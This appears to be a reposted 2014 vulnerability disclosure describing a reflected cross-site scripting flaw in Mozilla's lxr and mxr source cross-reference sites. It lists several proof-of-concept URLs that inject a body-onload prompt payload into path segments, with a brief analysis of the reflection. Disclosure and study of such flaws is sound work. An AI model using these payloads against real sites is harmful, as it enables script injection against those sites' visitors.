数学日记

数学是科学的皇后 - 高斯

 

Mozilla mozilla.org Two Sub-Domains ( Cross Refere

Domains:

https://lxr.mozilla.org/

https://mxr.mozilla.org/

(The two domains above are almost the same)

 

 

 


Websites information:

lxr.mozilla.orgmxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest‑and‑greatest. (from Mozilla)

 

 

 


Vulnerability description:

All pages under the following two URLs are vulnerable.

https://lxr.mozilla.org/mozilla-central/source

https://mxr.mozilla.org/mozilla-central/source

 

 

This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users.

 

Since there are large number of pages under them. Meanwhile, the contents of the two domains vary. This makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks to Mozilla's variety class of users.

 

The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.

 

 


POCs:

https://lxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>

https://lxr.mozilla.org/mozilla-central/source/mobile/android/<body onload=prompt("justqdjing")>

https://lxr.mozilla.org/mozilla-central/source/Android.mk/<body onload=prompt("tetraph")>

https://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/<body onload=prompt("tetraph")>

https://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp<body onload=prompt("tetraph")>

 

 


https://mxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>

https://mxr.mozilla.org/mozilla-central/source/webapprt/<body onload=prompt("justqdjing")>

https://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/<body onload=prompt("justqdjing")>

https://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/<body onload=prompt("tetraph")>

https://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/<body onload=prompt("tetraph")>

 

 

 


POC Video:

https://www.youtube.com/user/tetraph

 

 

 

 


Vulnerability Analysis:

Take the following link as an example,

https://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest>

 

We can see that for the page reflected, it contains the following codes.

<a href="/mozilla-central/source/chrome/%253Cattacktest%253E">

<attacktest></attacktest>

</a>

 

If we insert "<body onload=prompt("justqdjing")>" into the URL, the code can be executed.

 

 

 

 


The vulnerability can be attacked without user login. My tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

 

 


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. (From Wikepedia)

 

 

 


Vulnerability Discovery:

Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.

https://www.tetraph.com/wangjing/

 

 

 

 


More Details:

https://www.hotforsecurity.com/blog/cross-site-scripting-vulnerability-in-mozillas-cross-reference-sub-domains-10607.html

https://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/

https://www.xssposed.org/incidents/domain/lxr.mozilla.org/

https://www.youtube.com/watch?v=onA5BgC3zIY

https://itsecuritynews.info/2014/10/20/cross-site-scripting-vulnerability-in-mozillas-cross-reference-sub-domains/

https://news.softpedia.com/news/XSS-Risk-Found-In-Links-to-New-York-Times-Articles-Prior-to-2013-462334.shtml

https://brica.de/alerts/alert/public/791810/cross-site-scripting-xss-vulnerability-in-new-york-times-articles-before-2013/

https://infopunk.org/main/blog/2014/10/20/cross-site-scripting-vulnerability-in-mozillas-cross-reference-sub-domains/

https://www.csoonline.com/article/2136232/application-security/open-redirect-on-yahoo.html

https://sec.jetlib.com/Full_Disclosure/2014/10/19/Mozilla_mozilla.org_Two_Sub-Domains_%28_Cross_Reference%29_XSS_Vulnerability_%28_All_URLs_Under_the_Two_Domains%29


  5
评论
热度(5)

© 数学日记 | Powered by LOFTER